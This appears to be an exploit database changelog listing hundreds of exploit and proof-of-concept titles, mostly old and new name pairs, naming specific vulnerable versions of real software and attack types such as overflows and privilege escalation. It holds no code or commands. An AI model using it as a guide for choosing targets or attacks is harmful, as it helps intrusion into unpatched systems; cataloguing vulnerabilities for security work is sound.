DB: 2017-11-02
5 new exploits

Microsoft Internet Explorer - DHTML Object Handling Vulnerabilities (MS05-020)
Microsoft Internet Explorer - DHTML Object Handling (MS05-020)
Stoney FTPd - Denial of Service (rxBot mods ftpd)
Stoney FTPd - 'rxBot mods ftpd' Denial of Service
Microsoft Windows Server 2000 - UPNP (getdevicelist) Memory Leak Denial of Service
Microsoft Windows Server 2000 - UPNP 'getdevicelist' Memory Leak Denial of Service
Winamp 5.21 - .Midi File Header Handling Buffer Overflow (PoC)
Winamp 5.21 - '.Midi' File Header Handling Buffer Overflow (PoC)
Apache (mod_rewrite) < 1.3.37/2.0.59/2.2.3 - Remote Overflow (PoC)
Apache < 1.3.37/2.0.59/2.2.3 mod_rewrite - Remote Overflow (PoC)
ProFTPd 1.3.0a - 'mod_ctrls support' Local Buffer Overflow (PoC)
ProFTPd 1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (PoC)
Opera 9.10 - '.jpg' Image DHT Marker Heap Corruption Vulnerabilities
Opera 9.10 - '.jpg' Image DHT Marker Heap Corruption
ZOO - .ZOO File Decompression Infinite Loop Denial of Service (PoC)
Versalsoft HTTP File Uploader - ActiveX 6.36 (AddFile) Remote Denial of Service
ZOO - '.ZOO' Decompression Infinite Loop Denial of Service (PoC)
Versalsoft HTTP File Uploader - ActiveX 6.36 AddFile Remote Denial of Service
RhinoSoft Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service
RhinoSoft Serv-U FTP Server 7.3 - Authenticated 'stou con:1' Denial of Service
CUPS 1.3.7 - Cross-Site Request Forgery (add rss subscription) Remote Crash
CUPS 1.3.7 - Cross-Site Request Forgery (Add RSS Subscription) Remote Crash
Microsoft Office - Communicator (SIP) Remote Denial of Service
Microsoft Office - Communicator 'SIP' Remote Denial of Service
Apple Safari - 'ARGUMENTS' Array Integer Overflow (PoC) (Heap Spray)
Apple Safari - 'ARGUMENTS' Array Integer Overflow HeapSpray (PoC)
Amaya Web Editor 11.0 - XML / HTML Parser Vulnerabilities
Amaya Web Editor 11.0 - XML / HTML Parser
VideoLAN VLC Media Player 0.9.8a - Web UI (input) Remote Denial of Service
VideoLAN VLC Media Player 0.9.8a - Web UI 'input' Remote Denial of Service
Real Helix DNA - RTSP / SETUP Request Handler Vulnerabilities
Real Helix DNA - 'RTSP' / 'SETUP' Request Handler
BugHunter HTTP Server 1.6.2 - 'httpsv.exe' (GET 404) Remote Denial of Service
BugHunter HTTP Server 1.6.2 - 'httpsv.exe' GET 404 Remote Denial of Service
Apple Safari 3.2.3 (Windows x86) - JavaScript (eval) Remote Denial of Service
Apple Safari 3.2.3 (Windows x86) - JavaScript 'eval' Remote Denial of Service
httpdx 1.4 - HTTP Server (Host Header) Remote Format String Denial of Service
httpdx 1.4 - HTTP Server Host Header Remote Format String Denial of Service
Multiple Media Player - HTTP DataHandler Overflow (iTunes & QuickTime etc)
Multiple Media Players ((iTunes / QuickTime) - HTTP DataHandler Overflow
Microsoft Internet Explorer 6/7/8 - Denial of Service (Shockwave Flash Object)
Microsoft Internet Explorer 6/7/8 - Shockwave Flash Object Denial of Service
Adobe (Multiple Products) - XML External Entity / XML Injection Vulnerabilities
Adobe (Multiple Products) - XML External Entity / XML Injection
PHP (Multiple Functions) - Local Denial of Service Vulnerabilities
PHP (Multiple Functions) - Local Denial of Service
RPM Select/Elite 5.0 - '.xml config parsing' Unicode Buffer Overflow (PoC)
RPM Select/Elite 5.0 - '.xml Configuration parsing' Unicode Buffer Overflow (PoC)
Microsoft Windows - SMB2 Negotiate Protocol (0x72) Response Denial of Service
Microsoft Windows - SMB2 Negotiate Protocol '0x72' Response Denial of Service
Oreans Themida 2.1.8.0 - TMD File Handling Buffer Overflow
Oreans Themida 2.1.8.0 - '.TMD' File Handling Buffer Overflow
Play [EX] 2.1 - Playlist File (M3U/PLS/LST) Denial of Service
Play [EX] 2.1 - '.M3U'/'.PLS'/'.LST' Playlist File Denial of Service
Apple iTunes 10.6.1.7 - '.m3u' Playlist File Walking Heap Buffer Overflow
Apple iTunes 10.6.1.7 - '.m3u' Walking Heap Buffer Overflow
Ipswitch IMail 5.0.5/5.0.6/5.0.7 - POP3 Denial of Service (Possible Buffer Overflow)
Ipswitch IMail 5.0.5/5.0.6/5.0.7 - POP3 Denial of Service / Buffer Overflow
RedHat Linux 6.x - X Font Server Denial of Service / Buffer Overflow Vulnerabilities
RedHat Linux 6.x - X Font Server Denial of Service / Buffer Overflow
Qualcomm qpopper 2.53/3.0 / RedHat imap 4.5 -4_ UoW imap 4.5 popd - Lock File Denial of Service
Qualcomm qpopper 2.53/3.0 / RedHat imap 4.5 -4 / UoW imap 4.5 popd - Lock File Denial of Service
Axent NetProwler 3.0 - Malformed IP Packets Denial of Service (1)
Axent NetProwler 3.0 - Malformed IP Packets Denial of Service (2)
Axent NetProwler 3.0 - IP Packets Denial of Service (1)
Axent NetProwler 3.0 - IP Packets Denial of Service (2)
WFTPD 2.4.1RC11 - REST Command Malformed File Write Denial of Service
WFTPD 2.4.1RC11 - 'REST' Malformed File Write Denial of Service
id Software Quake 3 Arena Server 1.29 - Possible Buffer Overflow
id Software Quake 3 Arena Server 1.29 - Buffer Overflow
BSDI 3.0/3.1 - Possible Local Kernel Denial of Service
BSDI 3.0/3.1 - Local Kernel Denial of Service
Cisco IOS 11/12 - Malformed SNMP Message Denial of Service
Cisco IOS 11/12 - SNMP Message Denial of Service
Apache 1.3.x + Tomcat 4.0.x/4.1.x (Mod_JK) - Chunked Encoding Denial of Service
Apache 1.3.x + Tomcat 4.0.x/4.1.x mod_jk - Chunked Encoding Denial of Service
BitchX 1.0 - Malformed RPL_NAMREPLY Denial of Service
BitchX 1.0 - 'RPL_NAMREPLY' Denial of Service
RealPlayer 15.0.6.14(.3g2) - WriteAV Crash (PoC)
RealPlayer 15.0.6.14(.3g2) - 'WriteAV' Crash (PoC)
Plug And Play Web Server 1.0 002c - FTP Service Command Handler Buffer Overflow Vulnerabilities
Plug And Play Web Server 1.0 002c - FTP Service Command Handler Buffer Overflow
ProFTPd 1.2.7/1.2.8 - ASCII File Transfer Buffer Overrun
ProFTPd 1.2.7/1.2.8 - '.ASCII' File Transfer Buffer Overrun
Avaya Argent Office - Malformed DNS Packet Denial of Service
Avaya Argent Office - DNS Packet Denial of Service
Cisco IOS 12 MSFC2 - Malformed Layer 2 Frame Denial of Service
Cisco IOS 12 MSFC2 - Layer 2 Frame Denial of Service
ClamAV Daemon 0.65 - Malformed UUEncoded Message Denial of Service
Red-M Red-Alert 3.1 - Remote Vulnerabilities
ClamAV Daemon 0.65 - UUEncoded Message Denial of Service
Red-M Red-Alert 3.1 - Remote Exploit
Neon WebDAV Client Library 0.2x - Format String Vulnerabilities
Neon WebDAV Client Library 0.2x - Format String
Linux Kernel 2.4.x/2.6.x - Local Denial of Service / Memory Disclosure Vulnerabilities
Linux Kernel 2.4.x/2.6.x - Local Denial of Service / Memory Disclosure
Adobe Acrobat / Acrobat Reader 6.0 - ETD File Parser Format String
Adobe Acrobat / Acrobat Reader 6.0 - '.ETD' File Parser Format String
Check Point VPN-1 SecureClient - Malformed IP Address Local Memory Access
Check Point VPN-1 SecureClient - IP Address Local Memory Access
CenterICQ 4.20/4.5 - Malformed Packet Handling Remote Denial of Service
CenterICQ 4.20/4.5 - Packet Handling Remote Denial of Service
Microsoft Excel 95/97/2000/2002/2003/2004 - Unspecified Memory Corruption Vulnerabilities (MS06-012)
Microsoft Excel 95/97/2000/2002/2003/2004 - Unspecified Memory Corruption (MS06-012)
Mozilla (Multiple Products) - iFrame JavaScript Execution Vulnerabilities
Mozilla (Multiple Products) - iFrame JavaScript Execution
Microsoft .NET Framework SDK 1.0/1.1 - MSIL Tools Buffer Overflow Vulnerabilities
Microsoft .NET Framework SDK 1.0/1.1 - MSIL Tools Buffer Overflow
Apple Mac OSX 10.x - LZWDecodeVector (.tiff) Overflow
Apple Mac OSX 10.x - LZWDecodeVector '.tiff' Overflow
SolarWinds Server and Application Monitor - ActiveX (Pepco32c) Buffer Overflow
SolarWinds Server and Application Monitor - ActiveX 'Pepco32c' Buffer Overflow
Computer Associates BrightStor ARCserve Backup 11.5 - mediasvr caloggerd Denial of Service Vulnerabilities
Computer Associates BrightStor ARCserve Backup 11.5 - mediasvr caloggerd Denial of Service
Microsoft Windows XP - GDI+ ICO File Remote Denial of Service
Microsoft Windows XP - GDI+ '.ICO' File Remote Denial of Service
PHP 5.2.1 'GD' Extension - '.WBMP' File Integer Overflow Vulnerabilities
PHP 5.2.1 'GD' Extension - '.WBMP' File Integer Overflow
PC SOFT WinDEV 11 - WDP File Parsing Stack Buffer Overflow
PC SOFT WinDEV 11 - '.WDP' File Parsing Stack Buffer Overflow
Microsoft Forms 2.0 - ActiveX Control 2.0 Memory Access Violation Denial of Service Vulnerabilities
Microsoft Forms 2.0 - ActiveX Control 2.0 Memory Access Violation Denial of Service
libcdio 0.7x - GNU Compact Disc Input and Control Library Buffer Overflow Vulnerabilities
libcdio 0.7x - GNU Compact Disc Input and Control Library Buffer Overflow
Multiple Platform IPv6 Address Publication - Denial of Service Vulnerabilities
Multiple Platform IPv6 Address Publication - Denial of Service
Ruby 1.9 - WEBrick::HTTP::DefaultFileHandler Crafted HTTP Request Denial of Service
Ruby 1.9 - 'WEBrick::HTTP::DefaultFileHandler' Crafted HTTP Request Denial of Service
Apple Safari For Windows 3.2.1 - Malformed URI Remote Denial of Service
Apple Safari For Windows 3.2.1 - URI Remote Denial of Service
Apple Safari 4 - Malformed 'feeds:' URI Null Pointer Dereference Remote Denial of Service
Apple Safari 4 - 'feeds:' URI Null Pointer Dereference Remote Denial of Service
Microsoft Windows Media Player 11 - .AVI File Colorspace Conversion Remote Memory Corruption
Microsoft Windows Media Player 11 - '.AVI' File Colorspace Conversion Remote Memory Corruption
Apache 2.4.7 (mod_status) - Scoreboard Handling Race Condition
Apache 2.4.7 mod_status - Scoreboard Handling Race Condition
Battlefield 2/2142 - Malformed Packet Null Pointer Dereference Remote Denial of Service
Battlefield 2/2142 - Packet Null Pointer Dereference Remote Denial of Service
Foxit Products GIF Conversion - Memory Corruption (LZWMinimumCodeSize)
Foxit Products GIF Conversion - Memory Corruption (DataSubBlock)
Foxit Products GIF Conversion - 'LZWMinimumCodeSize' Memory Corruption
Foxit Products GIF Conversion - 'DataSubBlock' Memory Corruption
Paintshop Pro X7 - '.gif' Conversion Heap Memory Corruption Vulnerabilities (LZWMinimumCodeSize)
Paintshop Pro X7 - '.gif' Conversion Heap Memory Corruption 'LZWMinimumCodeSize'
Adobe Flash - Out-of-Bounds Memory Read While Parsing a Mutated TTF File Embedded in SWF
Adobe Flash - Out-of-Bounds Memory Read While Parsing a Mutated '.TTF' File Embedded in SWF
Adobe Flash - Heap Based Buffer Overflow Loading FLV File with Nellymoser Audio Codec
Adobe Flash - Heap Based Buffer Overflow Loading '.FLV' File with Nellymoser Audio Codec
PHP 5.4/5.5/5.6 - 'Unserialize()' Use-After-Free Vulnerabilities
PHP 5.4/5.5/5.6 - 'Unserialize()' Use-After-Free
Wireshark - file_read (wtap_read_bytes_or_eof/mp2t_find_next_pcr) Stack Based Buffer Overflow
Wireshark - memcpy (get_value / dissect_btatt) SIGSEGV
Wireshark - file_read 'wtap_read_bytes_or_eof/mp2t_find_next_pcr' Stack Based Buffer Overflow
Wireshark - memcpy 'get_value / dissect_btatt' SIGSEGV
Wireshark - addresses_equal (dissect_rsvp_common) Use-After-Free
Wireshark - addresses_equal 'dissect_rsvp_common' Use-After-Free
pdfium - opj_jp2_apply_pclr (libopenjpeg) Heap Based Out-of-Bounds Read
pdfium - opj_j2k_read_mcc (libopenjpeg) Heap Based Out-of-Bounds Read
Wireshark - iseries_check_file_type Stack Based Out-of-Bounds Read
pdfium - opj_jp2_apply_pclr 'libopenjpeg' Heap Based Out-of-Bounds Read
pdfium - opj_j2k_read_mcc 'libopenjpeg' Heap Based Out-of-Bounds Read
Wireshark - 'iseries_check_file_type' Stack Based Out-of-Bounds Read
Wireshark - nettrace_3gpp_32_423_file_open Stack Based Out-of-Bounds Read
Wireshark - 'nettrace_3gpp_32_423_file_open' Stack Based Out-of-Bounds Read
pdfium - opj_t2_read_packet_header (libopenjpeg) Heap Use-After-Free
pdfium - opj_t2_read_packet_header 'libopenjpeg' Heap Use-After-Free
Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption (MdConvertLine)
Samsung Galaxy S6 - 'android.media.process' 'MdConvertLine' Face Recognition Memory Corruption
Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - visor (treo_attach) Nullpointer Dereference
Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - visor 'treo_attach' Nullpointer Dereference
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Netwrix Auditor 7.1.322.0 - ActiveX 'sourceFile' Stack Buffer Overflow
Apple QuickTime < 7.7.79.80.95 - FPX File Parsing Memory Corruption 1
Apple QuickTime < 7.7.79.80.95 - FPX File Parsing Memory Corruption 2
Apple QuickTime < 7.7.79.80.95 - PSD File Parsing Memory Corruption
Apple QuickTime < 7.7.79.80.95 - '.FPX' Parsing Memory Corruption (1)
Apple QuickTime < 7.7.79.80.95 - '.FPX' Parsing Memory Corruption (2)
Apple QuickTime < 7.7.79.80.95 - '.PSD' Parsing Memory Corruption
Adobe Flash - Heap Overflow in ATF Processing (Image Reading)
Adobe Flash - Heap Overflow in ATF Processing Image Reading
Apache 2.4.23 (mod_http2) - Denial of Service
Apache 2.4.23 mod_http2 - Denial of Service
Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath)
Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Read with Malformed 'glyf' Table (win32k!fsc_CalcGrayRow)
Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Reads/Writes with Malformed 'fpgm' table 'win32k!bGeneratePath'
Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Read with Malformed 'glyf' Table 'win32k!fsc_CalcGrayRow'
WhatsApp 2.17.52 - Memory Corruption
ICQ Pro 2003a - Password Bypass Exploit (ca1-icq.asm)
ICQ Pro 2003a - 'ca1-icq.asm' Password Bypass Exploit
IBM DB2 - Universal Database 7.2 (db2licm) Local Exploit
IBM DB2 - Universal Database 7.2 'db2licm' Local Exploit
SuSE Linux 9.0 - YaST config Skribt Local Exploit
SuSE Linux 9.0 - YaST Configuration Skribt Local Exploit
Solaris locale - Format Strings (noexec stack) Exploit
Solaris locale - Format Strings 'noexec stack' Exploit
UUCP Exploit - File Creation/Overwriting (Symlinks) Exploit
UUCP Exploit - File Creation/Overwriting Symlinks Exploit
GnomeHack - Local Buffer Overflow (gid=games)
Kwintv - Local Buffer Overflow (gid=video(33))
GnomeHack - Local Buffer Overflow
Kwintv - Local Buffer Overflow
RedHat 6.1 man - Local Exploit (egid 15)
RedHat 6.1 man - 'egid 15' Local Exploit
Solaris 2.5.1 lp / lpsched - Symlink Vulnerabilities
Solaris 2.5.1 lp / lpsched - Symlink Exploit
SGI IRIX - Multiple Buffer Overflows (LsD)
SGI IRIX - 'LsD' Multiple Buffer Overflows
Solaris 5.5.1 X11R6.3 - xterm (-xrm) Privilege Escalation
Solaris 5.5.1 X11R6.3 - xterm '-xrm' Privilege Escalation
ProFTPd - 'ftpdctl pr_ctrls_connect' Exploit
ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Exploit
GlobalScape - CuteFTP macros (.mcr) Local
GlobalScape - CuteFTP macros '.mcr' Local
socat 1.4.0.2 - Local Format String (not setuid)
Socat 1.4.0.2 - Not SETUID Local Format String
TipxD 1.1.1 - Local Format String (not setuid)
TipxD 1.1.1 - Not SETUID Local Format String
GNU a2ps - 'Anything to PostScript' Local Exploit (Not SUID)
VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid)
GNU a2ps - 'Anything to PostScript' Not SUID Local Exploit
VisualBoyAdvanced 1.7.x - Non SUID Local Shell Exploit
eXeem 0.21 - Local Password Disclosure (asm)
eXeem 0.21 - Local Password Disclosure (ASM)
Microsoft Excel 2000/2003 - Hlink Local Buffer Overflow (French)
Microsoft Excel 2003 - Hlink Local Buffer Overflow (Italian)
WinRAR 3.60 Beta 6 - SFX Path Local Stack Overflow (French)
Microsoft Excel 2000/2003 (French) - Hlink Local Buffer Overflow
Microsoft Excel 2003 (Italian) - Hlink Local Buffer Overflow
WinRAR 3.60 Beta 6 (French) - SFX Path Local Stack Overflow
Microsoft PowerPoint 2003 SP2 - Local Code Execution (French)
Microsoft PowerPoint 2003 SP2 (French) - Local Code Execution
Xcode OpenBase 9.1.5 (OSX) - Privilege Escalation (Root File Create)
Xcode OpenBase 9.1.5 (OSX) - Root File Create Privilege Escalation
Apple Mac OSX 10.4.8 - DiskManagement BOM (cron) Privilege Escalation
Apple Mac OSX 10.4.8 - DiskManagement BOM 'cron' Privilege Escalation
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls support' Local Buffer Overflow (1)
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls support' Local Buffer Overflow (2)
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (1)
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (2)
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' Local Overflow (exec-shield)
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' exec-shield Local Overflow
Send ICMP Nasty Garbage (sing) - Append File Logrotate Exploit
Send ICMP Nasty Garbage (SING) - Append File Logrotate Exploit
Oracle 10g R1 - xdb.xdb_pitrig_pkg PLSQL Injection (change sys Password)
Oracle 10g R1 - xdb.xdb_pitrig_pkg PLSQL Injection (Change Sys Password)
VUPlayer 2.49 - '.asx' (HREF) Universal Buffer Overflow
VUPlayer 2.49 - '.asx' 'HREF' Universal Buffer Overflow
VUPlayer 2.49 - '.asx' (Universal) Local Buffer Overflow
VUPlayer 2.49 - '.asx' Universal Local Buffer Overflow
Zinf Audio Player 2.2.1 - '.pls' Local Buffer Overflow (Universal)
Zinf Audio Player 2.2.1 - '.pls' Universal Local Buffer Overflow
Foxit Reader 3.0 (Build 1301) - PDF Buffer Overflow (Universal)
Rosoft Media Player 4.2.1 - Local Buffer Overflow (multi target)
Foxit Reader 3.0 (Build 1301) - PDF Universal Buffer Overflow
Rosoft Media Player 4.2.1 - Local Buffer Overflow
Adobe Acrobat Reader - JBIG2 Universal Exploit (Bind Shell Port 5500)
Adobe Acrobat Reader - JBIG2 Universal Exploit
Mini-stream Ripper 3.0.1.1 - '.asx' (HREF) Local Buffer Overflow
Mini-stream Ripper 3.0.1.1 - '.asx' 'HREF' Local Buffer Overflow
Millenium MP3 Studio 1.0 - '.mpf' Local Stack Overflow (update)
Millenium MP3 Studio 1.0 - '.mpf' Local Stack Overflow (2)
BSD (Multiple Distributions) - 'setusercontext()' Vulnerabilities
BSD (Multiple Distributions) - 'setusercontext()' Exploit
Audacity 1.2 - '.gro' Universal Buffer Overflow (egg hunter)
Audacity 1.2 - '.gro' Universal Buffer Overflow (Egghunter)
NetAccess IP3 - Authenticated (ping option) Command Injection
NetAccess IP3 - Authenticated Ping Option Command Injection
Adobe Illustrator CS4 14.0.0 - Encapsulated Postscript (.eps) Buffer Overflow
Adobe Illustrator CS4 14.0.0 - Encapsulated Postscript '.eps' Buffer Overflow
Jasc Paint Shop Pro 8 - Local Buffer Overflow (Universal)
Jasc Paint Shop Pro 8 - Local Universal Buffer Overflow
HTML Help Workshop 4.74 - hhp Buffer Overflow (Universal)
HTML Help Workshop 4.74 - hhp Universal Buffer Overflow
Audiotran 1.4.1 - Buffer Overflow (Direct RET)
Audiotran 1.4.1 - Direct RET Buffer Overflow
Microsoft Windows NT/2000/2003/2008/XP/Vista/7 - User Mode to Ring Escalation (KiTrap0D) (MS10-015)
Microsoft Windows NT/2000/2003/2008/XP/Vista/7 - 'KiTrap0D' User Mode to Ring Escalation (MS10-015)
feedDemon 3.1.0.9 - opml File Buffer Overflow
feedDemon 3.1.0.9 - '.opml' File Buffer Overflow
Winamp 5.572 - Local Buffer Overflow (EIP + SEH DEP Bypass)
Winamp 5.572 - Local Buffer Overflow (EIP + SEH) (DEP Bypass)
GSM SIM Utility 5.15 - sms file Local Buffer Overflow (SEH)
GSM SIM Utility 5.15 - '.sms' File Local Buffer Overflow (SEH)
GSM SIM Utility 5.15 - Local Exploit (Direct RET)
GSM SIM Utility 5.15 - Direct RET Local Exploit
Microsoft Windows - Automatic LNK Shortcut File Code Execution
Microsoft Windows - Automatic .LNK Shortcut File Code Execution
QQPlayer 2.3.696.400p1 - smi File Buffer Overflow
QQPlayer 2.3.696.400p1 - '.smi' File Buffer Overflow
Microsoft Excel - Malformed FEATHEADER Record Exploit (MS09-067)
Microsoft Excel - FEATHEADER Record Exploit (MS09-067)
SnackAmp 3.1.3B - SMP Buffer Overflow (SEH DEP Bypass)
SnackAmp 3.1.3B - SMP Buffer Overflow (SEH) (DEP Bypass)
MP3-Nator - Buffer Overflow (SEH DEP Bypass)
MP3-Nator - Buffer Overflow (SEH) (DEP Bypass)
VisiWave - VWR File Parsing Trusted Pointer (Metasploit)
VisiWave - '.VWR' File Parsing Trusted Pointer (Metasploit)
F-Secure (Multiple Products) - ActiveX Overwrite (SEH) (Heap Spray)
F-Secure (Multiple Products) - ActiveX HeapSpray Overwrite (SEH)
Blade API Monitor - Unicode Bypass (Serial Number) Buffer Overflow
Blade API Monitor - Unicode Bypass Serial Number Buffer Overflow
SGI IRIX 5.3/6.2 & SGI license_oeo 1.0 LicenseManager - NETLS_LICENSE_FILE Exploit
SGI IRIX 6.4 & SGI license_oeo 3.0/3.1/3.1.1 LicenseManager - LICENSEMGR_FILE_ROOT Exploit
SGI IRIX 5.3/6.2 & SGI license_oeo 1.0 LicenseManager - 'NETLS_LICENSE_FILE' Exploit
SGI IRIX 6.4 & SGI license_oeo 3.0/3.1/3.1.1 LicenseManager - 'LICENSEMGR_FILE_ROOT' Exploit
Slackware Linux 3.4 - liloconfig-color Temporary file
Slackware Linux 3.4 - makebootdisk Temporary file
Slackware Linux 3.4 - 'liloconfig-color' Temporary file
Slackware Linux 3.4 - 'makebootdisk' Temporary file
Slackware Linux 3.4 - netconfig Temporary file
Slackware Linux 3.4 - pkgtool Temporary file
Slackware Linux 3.4 - 'netconfig' Temporary file
Slackware Linux 3.4 - 'pkgtool' Temporary file
IBM AIX eNetwork Firewall 3.2/3.3 - Insecure Temporary File Creation Vulnerabilities
IBM AIX eNetwork Firewall 3.2/3.3 - Insecure Temporary File Creation
IBM AIX 4.2.1 portmir - Buffer Overflow / Insecure Temporary File Creation Vulnerabilities
IBM AIX 4.2.1 portmir - Buffer Overflow / Insecure Temporary File Creation
GNU groff 1.11 a / HP-UX 10.0/11.0 / SGI IRIX 6.5.3 - Malicious Manpage Vulnerabilities
GNU groff 1.11 a / HP-UX 10.0/11.0 / SGI IRIX 6.5.3 - Malicious Manpage
Quinn - 'the Eskimo' and Peter N. Lewis Internet Config 1.0/2.0 Weak Password Encryption
Quinn - 'the Eskimo' and Peter N. Lewis Internet Configuration 1.0/2.0 Weak Password Encryption
MDAC 2.1.2.4202.3 / Microsoft Windows NT 4.0/SP1-6 JET/ODBC Patch and RDS Fix - Registry Key Vulnerabilities
MDAC 2.1.2.4202.3 / Microsoft Windows NT 4.0/SP1-6 JET/ODBC Patch / RDS Fix - Registry Key
Standard & Poors ComStock 4.2.4 - Machine Vulnerabilities
Standard & Poors ComStock 4.2.4 - Exploit
HP-UX 10.20/11.0 - SNMPD File Permission Vulnerabilities
HP-UX 10.20/11.0 - '.SNMPD' File Permission
CoolPlayer+ Portable 2.19.2 - Buffer Overflow (ASLR Bypass) (Large Shellcode)
CoolPlayer+ Portable 2.19.2 - Buffer Overflow (ASLR Bypass)
Samba 2.0.x - Insecure TMP file Symbolic Link
Samba 2.0.x - Insecure TMP File Symbolic Link
SuSE 7.0 - KFM Insecure TMP File Creation
SuSE 7.0 - KFM Insecure '.TMP' File Creation
QNX RTOS 4.25 - CRTTrap File Disclosure
QNX RTOS 4.25 - 'CRTTrap' File Disclosure
Linux Kernel 2.4 - SUID execve() System Call Race Condition Executable File Read (PoC)
Linux Kernel 2.4 - SUID 'execve()' System Call Race Condition Executable File Read (PoC)
BlazeVideo HDTV Player 6.6 Professional - Exploit (Direct RETN)
Aviosoft Digital TV Player Professional 1.x - '.PLF' Exploit (Direct Retn)
BlazeVideo HDTV Player 6.6 Professional - Direct RETN Exploit
Aviosoft Digital TV Player Professional 1.x - '.PLF' Direct Retn Exploit
BlazeDVD 6.1 - '.PLF' File Exploit (DEP + ASLR Bypass) (Metasploit)
BlazeDVD 6.1 - '.PLF' File Exploit (ASLR + DEP Bypass) (Metasploit)
Cscope 13.0/15.x - Insecure Temporary File Creation Vulnerabilities (1)
Cscope 13.0/15.x - Insecure Temporary File Creation Vulnerabilities (2)
Cscope 13.0/15.x - Insecure Temporary File Creation (1)
Cscope 13.0/15.x - Insecure Temporary File Creation (2)
Sony Playstation 3 (PS3) 4.31 - Save Game Preview SFO File Handling Local Command Execution
Sony Playstation 3 (PS3) 4.31 - Save Game Preview '.SFO' File Handling Local Command Execution
Microsoft Windows NT/2000/2003/2008/XP/Vista/7/8 - Local Ring Exploit (EPATHOBJ)
Microsoft Windows NT/2000/2003/2008/XP/Vista/7/8 - 'EPATHOBJ' Local Ring Exploit
PHP 5.0.5 - Safedir Restriction Bypass Vulnerabilities
PHP 5.0.5 - Safedir Restriction Bypass
AudioCoder 0.8.22 - '.m3u' Buffer Overflow (Direct Retn)
AudioCoder 0.8.22 - '.m3u' Direct Retn Buffer Overflow
AudioCoder 0.8.22 - '.lst' Buffer Overflow (Direct Retn)
AudioCoder 0.8.22 - '.lst' Direct Retn Buffer Overflow
KingView 6.53 - ActiveX Remote File Creation / Overwrite (KChartXY)
KingView 6.53 - 'KChartXY' ActiveX Remote File Creation / Overwrite
BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow (Direct RET)
BlazeDVD Pro Player 6.1 - Stack Based Direct RET Buffer Overflow
Linux Kernel 2.4.x/2.5.x/2.6.x - Sockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities
Linux Kernel 2.4.x/2.5.x/2.6.x - 'Sockaddr_In.Sin_Zero' Kernel Memory Disclosure
KingView 6.53 - Insecure ActiveX Control (SuperGrid)
KingView 6.53 - 'SuperGrid' Insecure ActiveX Control
Steinberg MyMp3PRO 5.0 - Buffer Overflow (SEH) (DEP Bypass with ROP)
Steinberg MyMp3PRO 5.0 - Buffer Overflow (SEH) (DEP Bypass + ROP)
BlazeDVD Pro Player 7.0 - '.plf' Stack Based Buffer Overflow (Direct RET)
BlazeDVD Pro Player 7.0 - '.plf' Stack Based Direct RETBuffer Overflow
Filemaker Pro 13.03 / Advanced 12.04 - Login Bypass / Privilege Escalation
Filemaker Pro 13.03 / Advanced 12.04 - Authentication Bypass / Privilege Escalation
Microsoft Windows Task Scheduler - DeleteExpiredTaskAfter File Deletion Privilege Escalation
Microsoft Windows Task Scheduler - 'DeleteExpiredTaskAfter' File Deletion Privilege Escalation
Linux 3.17 - noexec File Security Bypass (Python ctypes and memfd_create)
Linux 3.17 - 'Python ctypes and memfd_create' noexec File Security Bypass
FireEye - Malware Input Processor (uid=mip) Privilege Escalation
FireEye - Malware Input Processor Privilege Escalation
Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
Microsoft Windows 8.1 (x64) - 'RGNOBJ' Integer Overflow (MS16-098)
VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Config Host Root Privilege Escalation
VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Configuration Host Root Privilege Escalation
Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Buffer Overflow (SEH)
Microsoft Windows XP/2000 - RPC Remote (Non Exec Memory) Exploit
Microsoft Windows XP/2000 - RPC Remote Non Exec Memory Exploit
ProFTPd 1.2.10 - Remote Users Enumeration Exploit
ProFTPd 1.2.10 - Remote Users Enumeration
Multiple Browsers - Tabbed Browsing Vulnerabilities
Multiple Browsers - Tabbed Browsing
Ability Server 2.34 - FTP STOR Buffer Overflow (Unix Exploit)
Ability Server 2.34 (Unix) - FTP 'STOR' Buffer Overflow
Webmin 1.5 - Web Brute Force (cgi-version)
Webmin 1.5 - Web Brute Force (CGI)
Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (French) (MS05-039)
Battlefield (BFCC/BFVCC/BF2CC) - Login Bypass/Pass Stealer/Denial of Service
Microsoft Windows Plug-and-Play Service (French) - Remote Universal Exploit (MS05-039)
Battlefield (BFCC < 1.22_A /BFVCC < 2.14_B / BF2CC) - Authentication Bypass / Password Stealer / Denial of Service
Lynx 2.8.6dev.13 - Remote Buffer Overflow (port bind)
Lynx 2.8.6dev.13 - Remote Buffer Overflow
Mercury Mail Transport System 4.01b - Remote Exploit (PH SERVER)
Mercury Mail Transport System 4.01b - PH SERVER Remote Exploit
SHOUTcast 1.9.4 - File Request Format String (Leaked)
SHOUTcast 1.9.4 - File Request 'Leaked' Format String
Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution (extra)
Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution
MySQL 4.x/5.0 (Windows) - User-Defined Function (UDF) Command Execution
MySQL 4.x/5.0 (Windows) - User-Defined Function Command Execution
GNU Mailutils imap4d 0.6 - Remote Format String (exec-shield)
GNU Mailutils imap4d 0.6 - exec-shield Remote Format String
